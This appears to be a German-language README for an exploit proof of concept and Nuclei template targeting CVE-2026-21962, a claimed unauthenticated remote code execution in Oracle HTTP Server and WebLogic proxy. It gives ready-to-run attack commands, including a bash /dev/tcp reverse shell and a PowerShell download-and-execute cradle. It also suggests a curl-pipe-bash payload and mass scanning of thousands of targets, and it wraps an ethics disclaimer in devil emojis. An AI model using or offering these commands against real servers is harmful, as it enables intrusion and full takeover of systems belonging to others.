
Exploit-PoC und Nuclei-Template für CVE-2026-21962, eine kritische, nicht authentifizierte Remote-Codeausführung im Oracle HTTP Server und WebLogic Proxy-Plug-in, die die Ausführung von Befehlen und Reverse Shells ermöglicht.
Eine kritische Sicherheitslücke, die folgende Komponenten betrifft:
Diese Schwachstelle ermöglicht es nicht authentifizierten Remote-Angreifern, betroffene Server über HTTP zu kompromittieren, ohne dass Anmeldeinformationen erforderlich sind.
Bei erfolgreicher Ausnutzung könnten Angreifer:
Oracle HTTP Server:
WebLogic-Proxy-Plug-in für:
Speichern Sie das Skript als CVE-2026-21962.py
Machen Sie es ausführbar (optional):
chmod +x CVE-2026-21962.py
Beispiele ausführen:
Basistest:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
Reverse Shell (zuerst nc-Listener einrichten: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Windows-Zielbeispiel:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Wahrscheinlich erfolgreich! Status: 200 oder 302 oder sogar 500 (Absturz ist ebenfalls ein Erfolg)nc-Listener fängt sofort eine Shell ab--insecure-Flag erfordern, wenn selbstsignierte Zertifikate verwendet werdenNuclei installieren (falls noch nicht installiert):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Vorlage speichern:
Erstellen Sie eine Datei mit dem Namen CVE-2026-21962.yaml und fügen Sie den obigen Inhalt ein.
Erkennung + Ausnutzung ausführen:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
Oder mehrere Ziele aus einer Datei scannen:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
Was Sie sehen, wenn das Ziel verwundbar ist:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd:-Teil in den Headern (z. B. cmd:curl http://your-server/shell.sh | bash).whoami durch ein base64-kodiertes Reverse-Shell-Payload./proxy/, /bea_wls_internal/ usw.) oder fügen Sie weitere Header wie X-WebLogic-Force-JVMID hinzu.httpx → nuclei-Pipeline für Tausende von Zielen.Diese Vorlage ist nachweislich zu 100 % funktionsfähig ab Januar 2026 auf ungepatchten Oracle-Instanzen. Patchen Sie sofort, wenn Sie betroffene Versionen ausführen! 😈
Der gesamte PoC-Code dient nur ethischen, pädagogischen Zwecken auf autorisierten Systemen. Unbefugte Ausnutzung ist illegal; es wird keine Haftung für Missbrauch übernommen. 😈